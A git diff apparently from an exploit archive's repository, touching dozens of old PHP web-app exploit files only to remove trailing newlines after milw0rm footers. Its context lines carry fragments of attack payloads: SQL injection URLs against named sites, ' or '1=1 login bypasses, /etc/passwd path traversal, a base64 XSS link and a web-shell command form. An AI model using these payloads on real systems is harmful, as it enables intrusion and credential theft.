b/platforms/php/webapps/8928.txt index 90d7b5019..68e3591c6 100755 --- a/platforms/php/webapps/8928.txt +++ b/platforms/php/webapps/8928.txt @@ -46,4 +46,4 @@ ---------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-06-11] +# milw0rm.com [2009-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/8929.txt b/platforms/php/webapps/8929.txt index 0af85fbe5..382d38bfa 100755 --- a/platforms/php/webapps/8929.txt +++ b/platforms/php/webapps/8929.txt @@ -135,4 +135,4 @@ pCategory=-1'+UNION+ALL+SELECT+'SPLOG <= 1.2 Beta--SHELL BY --Y3NH4 ############################################################################## ############################################################################## -# milw0rm.com [2009-06-11] +# milw0rm.com [2009-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/8931.txt b/platforms/php/webapps/8931.txt index 24356f9cd..f7e3fad50 100755 --- a/platforms/php/webapps/8931.txt +++ b/platforms/php/webapps/8931.txt @@ -44,4 +44,4 @@ ---------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-06-11] +# milw0rm.com [2009-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/8932.txt b/platforms/php/webapps/8932.txt index ee9ca661e..4798b8229 100755 --- a/platforms/php/webapps/8932.txt +++ b/platforms/php/webapps/8932.txt @@ -53,4 +53,4 @@ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-06-11] +# milw0rm.com [2009-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/8933.php b/platforms/php/webapps/8933.php index 2b9767df1..f0060e510 100755 --- a/platforms/php/webapps/8933.php +++ b/platforms/php/webapps/8933.php @@ -25,4 +25,4 @@ $data = split("::",$src); echo "Admin: $data[1]\nPassword: $data[2]\n"; ?> -# milw0rm.com [2009-06-11] +# milw0rm.com [2009-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/8935.txt b/platforms/php/webapps/8935.txt index 6734dc18b..73d9ce1c8 100755 --- a/platforms/php/webapps/8935.txt +++ b/platforms/php/webapps/8935.txt @@ -34,4 +34,4 @@ Senha: ' or ' @~~=:/ -# milw0rm.com [2009-06-12] +# milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/8936.txt b/platforms/php/webapps/8936.txt index 17a9a02b2..93db308e7 100755 --- a/platforms/php/webapps/8936.txt +++ b/platforms/php/webapps/8936.txt @@ -141,4 +141,4 @@ Im sure the 4images team wont take advice from a 19 year old :) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=- Salamz to All Muslim Hackers. -# milw0rm.com [2009-06-12] +# milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/8937.txt b/platforms/php/webapps/8937.txt index b5aaf78eb..d8a3e1082 100755 --- a/platforms/php/webapps/8937.txt +++ b/platforms/php/webapps/8937.txt @@ -48,4 +48,4 @@ Fecha: 12 jun 2009 Gretz: UnderSecurity.net +-----------------------------------------------------------------------------+ -# milw0rm.com [2009-06-12] +# milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/8939.pl b/platforms/php/webapps/8939.pl index 995bd0629..c2aa7629a 100755 --- a/platforms/php/webapps/8939.pl +++ b/platforms/php/webapps/8939.pl @@ -174,4 +174,4 @@ sub phpWebThings::init "[*--------------------------------------------------------------------*]\n"; } -# milw0rm.com [2009-06-12] +# milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/8941.txt b/platforms/php/webapps/8941.txt index 712df1ac6..fb36cdabe 100755 --- a/platforms/php/webapps/8941.txt +++ b/platforms/php/webapps/8941.txt @@ -80,4 +80,4 @@ Disclosure Information: All of the best, MaXe -# milw0rm.com [2009-06-12] +# milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/8942.txt b/platforms/php/webapps/8942.txt index 4f8b6f77b..5ddddb184 100755 --- a/platforms/php/webapps/8942.txt +++ b/platforms/php/webapps/8942.txt @@ -65,4 +65,4 @@ Disclosure Information: All of the best, MaXe -# milw0rm.com [2009-06-12] +# milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/8943.txt b/platforms/php/webapps/8943.txt index a50187bab..0217bd0d3 100755 --- a/platforms/php/webapps/8943.txt +++ b/platforms/php/webapps/8943.txt @@ -60,4 +60,4 @@ Disclosure Information: All of the best, MaXe -# milw0rm.com [2009-06-12] +# milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/8944.txt b/platforms/php/webapps/8944.txt index b45db197a..82e64b212 100755 --- a/platforms/php/webapps/8944.txt +++ b/platforms/php/webapps/8944.txt @@ -22,4 +22,4 @@ See Pic :http://www.almlf.com/get-6-2009-almlf_com_akszizl2.png / _____ \ | `----./ _____ \ | '--' || |____ | | | | | | /__/ \__\ \______/__/ \__\ |_______/ |_______||__| |__| |__| -# milw0rm.com [2009-06-12] +# milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/8946.txt b/platforms/php/webapps/8946.txt index 8045c8716..9d93930df 100755 --- a/platforms/php/webapps/8946.txt +++ b/platforms/php/webapps/8946.txt @@ -31,4 +31,4 @@ @~~=:/ -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8947.txt b/platforms/php/webapps/8947.txt index 38f321b01..2eebffa58 100755 --- a/platforms/php/webapps/8947.txt +++ b/platforms/php/webapps/8947.txt @@ -32,4 +32,4 @@ or die("<p>" . mysql_error() . "</p>\n"); ################################################################################################################# -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8948.txt b/platforms/php/webapps/8948.txt index a73c56b82..272f64cf9 100755 --- a/platforms/php/webapps/8948.txt +++ b/platforms/php/webapps/8948.txt @@ -47,4 +47,4 @@ ---------------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8949.txt b/platforms/php/webapps/8949.txt index 3dd93f99f..207679eed 100755 --- a/platforms/php/webapps/8949.txt +++ b/platforms/php/webapps/8949.txt @@ -197,4 +197,4 @@ author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8950.txt b/platforms/php/webapps/8950.txt index c1deb3151..65088528d 100755 --- a/platforms/php/webapps/8950.txt +++ b/platforms/php/webapps/8950.txt @@ -259,4 +259,4 @@ author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8951.php b/platforms/php/webapps/8951.php index 48449c14f..9bccfb61c 100755 --- a/platforms/php/webapps/8951.php +++ b/platforms/php/webapps/8951.php @@ -160,4 +160,4 @@ Command: <input type="text" name="cmd" value="whoami" /><br /><br /> ?> -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8952.txt b/platforms/php/webapps/8952.txt index a36b3b3a3..8d1eccc1b 100755 --- a/platforms/php/webapps/8952.txt +++ b/platforms/php/webapps/8952.txt @@ -27,4 +27,4 @@ include "./sites/$u.php"; ####################################################################### -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8953.txt b/platforms/php/webapps/8953.txt index 9b6d72fdd..18da39997 100755 --- a/platforms/php/webapps/8953.txt +++ b/platforms/php/webapps/8953.txt @@ -127,4 +127,4 @@ Etc.. ############################################### EOF ################################################## -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8954.txt b/platforms/php/webapps/8954.txt index 95ab4b6a9..495d402db 100755 --- a/platforms/php/webapps/8954.txt +++ b/platforms/php/webapps/8954.txt @@ -23,4 +23,4 @@ ################################################################################################################# -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8956.htm b/platforms/php/webapps/8956.htm index f70abfb52..ffc513fb1 100755 --- a/platforms/php/webapps/8956.htm +++ b/platforms/php/webapps/8956.htm @@ -35,4 +35,4 @@ </table> </form> -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8958.txt b/platforms/php/webapps/8958.txt index ad2610e5c..0245c477f 100755 --- a/platforms/php/webapps/8958.txt +++ b/platforms/php/webapps/8958.txt @@ -671,4 +671,4 @@ Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ ---------------------------------- [ EOF ] ------------------------------------ -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8959.pl b/platforms/php/webapps/8959.pl index 1f2e4b587..6ecb5aea1 100755 --- a/platforms/php/webapps/8959.pl +++ b/platforms/php/webapps/8959.pl @@ -84,4 +84,4 @@ sub istrue2 } } -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8961.txt b/platforms/php/webapps/8961.txt index 152fe0e69..0d94c296d 100755 --- a/platforms/php/webapps/8961.txt +++ b/platforms/php/webapps/8961.txt @@ -18,4 +18,4 @@ big thanks str0ke for you! be safe all :) -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8962.txt b/platforms/php/webapps/8962.txt index 01c806542..0e0684216 100755 --- a/platforms/php/webapps/8962.txt +++ b/platforms/php/webapps/8962.txt @@ -12,4 +12,4 @@ ################################################################################################################# -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8965.txt b/platforms/php/webapps/8965.txt index 50bb203e7..055b246be 100755 --- a/platforms/php/webapps/8965.txt +++ b/platforms/php/webapps/8965.txt @@ -35,4 +35,4 @@ Bug founded by d3v1l [Avram Marius] Date: 14.06.2009 -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8966.txt b/platforms/php/webapps/8966.txt index 4fcf6814a..1b7bfb012 100755 --- a/platforms/php/webapps/8966.txt +++ b/platforms/php/webapps/8966.txt @@ -21,4 +21,4 @@ = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8967.txt b/platforms/php/webapps/8967.txt index 8569d7021..989fa3fda 100755 --- a/platforms/php/webapps/8967.txt +++ b/platforms/php/webapps/8967.txt @@ -38,4 +38,4 @@ Result: Log off ################################################################################################################ -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/8968.txt b/platforms/php/webapps/8968.txt index 4f70ae36d..3c8019119 100755 --- a/platforms/php/webapps/8968.txt +++ b/platforms/php/webapps/8968.txt @@ -106,4 +106,4 @@ for ($c=97;$c<=102;$c++) } -# milw0rm.com [2009-06-15] +# milw0rm.com [2009-06-15] \ No newline at end of file diff --git a/platforms/php/webapps/897.cpp b/platforms/php/webapps/897.cpp index 220dd7386..e28206cd0 100755 --- a/platforms/php/webapps/897.cpp +++ b/platforms/php/webapps/897.cpp @@ -74,4 +74,4 @@ int main() } -// milw0rm.com [2005-03-24] +// milw0rm.com [2005-03-24] \ No newline at end of file diff --git a/platforms/php/webapps/8974.txt b/platforms/php/webapps/8974.txt index cbe22be4c..5f93d48b3 100755 --- a/platforms/php/webapps/8974.txt +++ b/platforms/php/webapps/8974.txt @@ -1,4 +1,3 @@ - ======================================================================== XOOPS <= 2.3.3 Remote Arbitrary File Retrieval ======================================================================== @@ -111,4 +110,4 @@ # Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke -# milw0rm.com [2009-06-16] +# milw0rm.com [2009-06-16] \ No newline at end of file diff --git a/platforms/php/webapps/8975.txt b/platforms/php/webapps/8975.txt index 342ed7627..d44367333 100755 --- a/platforms/php/webapps/8975.txt +++ b/platforms/php/webapps/8975.txt @@ -16,4 +16,4 @@ path/include/page_bottom.php?_FORUM[settings_design_style]={[(local_file)]}%00 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=- -# milw0rm.com [2009-06-17] +# milw0rm.com [2009-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/8977.txt b/platforms/php/webapps/8977.txt index 0d09a6e04..0522579a4 100755 --- a/platforms/php/webapps/8977.txt +++ b/platforms/php/webapps/8977.txt @@ -34,4 +34,4 @@ http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT # ########################### -# milw0rm.com [2009-06-17] +# milw0rm.com [2009-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/8978.txt b/platforms/php/webapps/8978.txt index 3cd981950..7c057085d 100755 --- a/platforms/php/webapps/8978.txt +++ b/platforms/php/webapps/8978.txt @@ -75,4 +75,4 @@ Vulnerable code: display.php (local file corruption register_gl=1) [x] http://www.youtube.com/watch?v=h3DQmJOkSY0 -# milw0rm.com [2009-06-17] +# milw0rm.com [2009-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/8979.txt b/platforms/php/webapps/8979.txt index e569ec507..a583b244f 100755 --- a/platforms/php/webapps/8979.txt +++ b/platforms/php/webapps/8979.txt @@ -111,4 +111,4 @@ INSECURE COOKIE HANDLING (LFI): ############################################################################## ############################################################################## -# milw0rm.com [2009-06-17] +# milw0rm.com [2009-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/8980.py b/platforms/php/webapps/8980.py index 467027244..c544c3d2a 100755 --- a/platforms/php/webapps/8980.py +++ b/platforms/php/webapps/8980.py @@ -220,4 +220,4 @@ print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n" print "\t\t<<------------------------EOF---------------------->>\n\n" #Check all arguments -# milw0rm.com [2009-06-17] +# milw0rm.com [2009-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/8981.txt b/platforms/php/webapps/8981.txt index 56af1e917..4d2c25183 100755 --- a/platforms/php/webapps/8981.txt +++ b/platforms/php/webapps/8981.txt @@ -18,4 +18,4 @@ Go To; http://target.com/uye_paneli.php?islem=bilgilerim ######################################################## -# milw0rm.com [2009-06-17] +# milw0rm.com [2009-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/8984.txt b/platforms/php/webapps/8984.txt index b707384c6..45d70e520 100755 --- a/platforms/php/webapps/8984.txt +++ b/platforms/php/webapps/8984.txt @@ -64,4 +64,4 @@ PoC DEMO:http://demo.cmsbuzz.com ################################################################################################################ -# milw0rm.com [2009-06-18] +# milw0rm.com [2009-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/8988.txt b/platforms/php/webapps/8988.txt index 6992537a3..3832ba811 100755 --- a/platforms/php/webapps/8988.txt +++ b/platforms/php/webapps/8988.txt @@ -141,4 +141,4 @@ function displayimage( $fn, $lastMod, $fs ) ````````````````` Salamz to All Muslim Hackers. -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/8990.txt b/platforms/php/webapps/8990.txt index ae61e4f98..200832720 100755 --- a/platforms/php/webapps/8990.txt +++ b/platforms/php/webapps/8990.txt @@ -21,4 +21,4 @@ http://www.w2b.ru/demo/phpDatingClub/ ###################################################################### Greeting : Super_Ctistal (My Master) And all Muslims&algerian Hackers -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/8992.php b/platforms/php/webapps/8992.php index 7f7511439..d557a749c 100755 --- a/platforms/php/webapps/8992.php +++ b/platforms/php/webapps/8992.php @@ -302,4 +302,4 @@ function exploit_site($url) { ?> -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/8993.txt b/platforms/php/webapps/8993.txt index 6d1cfffdf..d40be2048 100755 --- a/platforms/php/webapps/8993.txt +++ b/platforms/php/webapps/8993.txt @@ -104,4 +104,4 @@ http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=Unfr ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/8994.txt b/platforms/php/webapps/8994.txt index 4b31332e5..6828f5141 100755 --- a/platforms/php/webapps/8994.txt +++ b/platforms/php/webapps/8994.txt @@ -11,4 +11,4 @@ http://www.awscripts.com/demo_se/awse/awse_admin/index.php ################################################################################################################ -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/8996.txt b/platforms/php/webapps/8996.txt index 8581c42d7..417aeace5 100755 --- a/platforms/php/webapps/8996.txt +++ b/platforms/php/webapps/8996.txt @@ -15,4 +15,4 @@ Discovered By:Lo$er http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/8997.txt b/platforms/php/webapps/8997.txt index ebaa0f0c8..de0805d3d 100755 --- a/platforms/php/webapps/8997.txt +++ b/platforms/php/webapps/8997.txt @@ -54,4 +54,4 @@ global $config; AND XSS bonus: http://www.kasseler-cms.net/engine.php?do=redirect&url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+ -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/8998.txt b/platforms/php/webapps/8998.txt index 256519e76..c99892236 100755 --- a/platforms/php/webapps/8998.txt +++ b/platforms/php/webapps/8998.txt @@ -35,4 +35,4 @@ xxajax: ChangeEmail xajaxargs[]: ADMIN_ID xajaxargs[]: EMAIL_TO_CHANGE_TO -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/8999.txt b/platforms/php/webapps/8999.txt index 8efcd3e9f..09aa4b4b5 100755 --- a/platforms/php/webapps/8999.txt +++ b/platforms/php/webapps/8999.txt @@ -40,4 +40,4 @@ http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/9000.txt b/platforms/php/webapps/9000.txt index fd22adb98..3f76d3566 100755 --- a/platforms/php/webapps/9000.txt +++ b/platforms/php/webapps/9000.txt @@ -25,4 +25,4 @@ http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(us ======================================================= all my Friends -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/9001.php b/platforms/php/webapps/9001.php index 711d5aae6..c3955367e 100755 --- a/platforms/php/webapps/9001.php +++ b/platforms/php/webapps/9001.php @@ -428,4 +428,4 @@ class maibibi2 ?> -# milw0rm.com [2009-06-22] +# milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/9004.txt b/platforms/php/webapps/9004.txt index 035e27a5b..e6efaa320 100755 --- a/platforms/php/webapps/9004.txt +++ b/platforms/php/webapps/9004.txt @@ -731,4 +731,4 @@ class phpsploit ?> -# milw0rm.com [2009-06-23] +# milw0rm.com [2009-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/9005.py b/platforms/php/webapps/9005.py index ed74f6ab4..067252ea1 100755 --- a/platforms/php/webapps/9005.py +++ b/platforms/php/webapps/9005.py @@ -55,4 +55,4 @@ while True: else: print '>> failed, be sure to end with ; (', cmd, ")" -# milw0rm.com [2009-06-23] +# milw0rm.com [2009-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/9009.txt b/platforms/php/webapps/9009.txt index 0ff0751f0..dea3c900e 100755 --- a/platforms/php/webapps/9009.txt +++ b/platforms/php/webapps/9009.txt @@ -14,4 +14,4 @@ path=/"; Note: After creating cookie go to http://[website]/base_main.php -# milw0rm.com [2009-06-24] +# milw0rm.com [2009-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/901.pl b/platforms/php/webapps/901.pl index 10ae29ae7..0360c232a 100755 --- a/platforms/php/webapps/901.pl +++ b/platforms/php/webapps/901.pl @@ -84,4 +84,4 @@ while(<$socket>){ if(/$str/) { $suc = 1; last; } } #--- EOF --- -# milw0rm.com [2005-03-29] +# milw0rm.com [2005-03-29] \ No newline at end of file diff --git a/platforms/php/webapps/9010.txt b/platforms/php/webapps/9010.txt index 2dd97e080..b2f870085 100755 --- a/platforms/php/webapps/9010.txt +++ b/platforms/php/webapps/9010.txt @@ -17,4 +17,4 @@ |-->Exploit : | http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00 -# milw0rm.com [2009-06-24] +# milw0rm.com [2009-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/9011.txt b/platforms/php/webapps/9011.txt index f304e09bf..1d8e72c19 100755 --- a/platforms/php/webapps/9011.txt +++ b/platforms/php/webapps/9011.txt @@ -36,4 +36,4 @@ |Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's ############################################################## -# milw0rm.com [2009-06-24] +# milw0rm.com [2009-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/9014.txt b/platforms/php/webapps/9014.txt index 894402407..7e90cbde7 100755 --- a/platforms/php/webapps/9014.txt +++ b/platforms/php/webapps/9014.txt @@ -47,4 +47,4 @@ website: http://www.hack0wn.com/ __h0__ -# milw0rm.com [2009-06-24] +# milw0rm.com [2009-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/9015.txt b/platforms/php/webapps/9015.txt index 874766e09..28af95883 100755 --- a/platforms/php/webapps/9015.txt +++ b/platforms/php/webapps/9015.txt @@ -16,4 +16,4 @@ PoC: Greetz: YEnH4ckEr, str0ke and spanish hackers! -# milw0rm.com [2009-06-24] +# milw0rm.com [2009-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/9016.txt b/platforms/php/webapps/9016.txt index c409d4d2f..f2bc54ae6 100755 --- a/platforms/php/webapps/9016.txt +++ b/platforms/php/webapps/9016.txt @@ -38,4 +38,4 @@ http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=cate #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2009-06-24] +# milw0rm.com [2009-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/9017.txt b/platforms/php/webapps/9017.txt index d6750f206..23826b1dc 100755 --- a/platforms/php/webapps/9017.txt +++ b/platforms/php/webapps/9017.txt @@ -34,4 +34,4 @@ if ($answer =~/<pass>(.*?)<pass>/){print "\n[+] Admin Hash : $1\n\n"; print "\t\t# Exploit has ben aported user and password hash #\n\n";} else{print "\n[-] Exploit Failed...\n";} -# milw0rm.com [2009-06-25] +# milw0rm.com [2009-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/9019.txt b/platforms/php/webapps/9019.txt index 93b7c2021..dcc794dd1 100755 --- a/platforms/php/webapps/9019.txt +++ b/platforms/php/webapps/9019.txt @@ -151,4 +151,4 @@ EXPLOITS: ############################################################################## ############################################################################## -# milw0rm.com [2009-06-25] +# milw0rm.com [2009-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/9020.py b/platforms/php/webapps/9020.py index 24d737106..4b86034e5 100755 --- a/platforms/php/webapps/9020.py +++ b/platforms/php/webapps/9020.py @@ -284,4 +284,4 @@ print "\n\t\t<<----------------------FINISH!-------------------->>\n\n" print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n" print "\t\t<<------------------------EOF---------------------->>\n\n" -# milw0rm.com [2009-06-25] +# milw0rm.com [2009-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/9021.txt b/platforms/php/webapps/9021.txt index 917abadc5..c13c53dc4 100755 --- a/platforms/php/webapps/9021.txt +++ b/platforms/php/webapps/9021.txt @@ -35,4 +35,4 @@ thanks to s3rg3770 and warwolfz Crew Have Fun :D -# milw0rm.com [2009-06-25] +# milw0rm.com [2009-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/9022.txt b/platforms/php/webapps/9022.txt index bfe8a53c7..8f60b5d65 100755 --- a/platforms/php/webapps/9022.txt +++ b/platforms/php/webapps/9022.txt @@ -41,4 +41,4 @@ | | +===================================================================================+ -# milw0rm.com [2009-06-26] +# milw0rm.com [2009-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/9023.txt b/platforms/php/webapps/9023.txt index d0def7674..0555cc718 100755 --- a/platforms/php/webapps/9023.txt +++ b/platforms/php/webapps/9023.txt @@ -128,4 +128,4 @@ SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo ############################################################################## ############################################################################## -# milw0rm.com [2009-06-26] +# milw0rm.com [2009-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/9024.txt b/platforms/php/webapps/9024.txt index f6f5d3240..192416a32 100755 --- a/platforms/php/webapps/9024.txt +++ b/platforms/php/webapps/9024.txt @@ -21,4 +21,4 @@ Password:' or '1=1 His0k4 - Dr-HTmL And Dos-Dz TeaM aND Snakes TeaM And Ev!L-C0d3r. ----------------------------------------------------------------- -# milw0rm.com [2009-06-26] +# milw0rm.com [2009-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/9025.txt b/platforms/php/webapps/9025.txt index 820d1a7ef..204b201e5 100755 --- a/platforms/php/webapps/9025.txt +++ b/platforms/php/webapps/9025.txt @@ -15,4 +15,4 @@ make querys now. ################################################################################################################# -# milw0rm.com [2009-06-26] +# milw0rm.com [2009-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/9026.txt b/platforms/php/webapps/9026.txt index 0255da4a8..edb116e10 100755 --- a/platforms/php/webapps/9026.txt +++ b/platforms/php/webapps/9026.txt @@ -49,4 +49,4 @@ +===================================================================================+ E0D|F -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9027.txt b/platforms/php/webapps/9027.txt index 7fc323bb2..8619b1b0f 100755 --- a/platforms/php/webapps/9027.txt +++ b/platforms/php/webapps/9027.txt @@ -41,4 +41,4 @@ +===================================================================================+ E0D|F -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9028.txt b/platforms/php/webapps/9028.txt index 445dfd24f..9e25ba30a 100755 --- a/platforms/php/webapps/9028.txt +++ b/platforms/php/webapps/9028.txt @@ -115,4 +115,4 @@ for ($c=97;$c<=102;$c++) } } -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9030.txt b/platforms/php/webapps/9030.txt index 4d480a0cf..c25858406 100755 --- a/platforms/php/webapps/9030.txt +++ b/platforms/php/webapps/9030.txt @@ -43,4 +43,4 @@ http://ajedrezmarketing.com/index.php?option=com_k2&view=itemlist&category=null' [!] Produced in South America --------------------------------- -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9032.txt b/platforms/php/webapps/9032.txt index f8ec1dbf0..0ae959fa7 100755 --- a/platforms/php/webapps/9032.txt +++ b/platforms/php/webapps/9032.txt @@ -35,4 +35,4 @@ Vendor website: http://www.osticket.com 3.25.2009 - Vendor notification & initial vendor response 6.26.2009 - Vendor releases fix in osTicket v1.6 RC5 -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9035.txt b/platforms/php/webapps/9035.txt index f06ba7353..2ff73b923 100755 --- a/platforms/php/webapps/9035.txt +++ b/platforms/php/webapps/9035.txt @@ -85,4 +85,4 @@ echo "\n\n---Qabandi Was Here------------------------------------------\n\n"; die; ?> -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9036.txt b/platforms/php/webapps/9036.txt index 2ab274960..172dfe00f 100755 --- a/platforms/php/webapps/9036.txt +++ b/platforms/php/webapps/9036.txt @@ -17,4 +17,4 @@ xpl: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=- -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9037.txt b/platforms/php/webapps/9037.txt index 7a7c82874..e65b24196 100755 --- a/platforms/php/webapps/9037.txt +++ b/platforms/php/webapps/9037.txt @@ -18,4 +18,4 @@ Demo http://www.t68.clicknet.dk/index.php?side=../index ################################################################################################################ -# milw0rm.com [2009-06-29] +# milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/9040.txt b/platforms/php/webapps/9040.txt index 3a4a23253..87243e9ed 100755 --- a/platforms/php/webapps/9040.txt +++ b/platforms/php/webapps/9040.txt @@ -48,4 +48,4 @@ else{print "\n[-] Veprimi 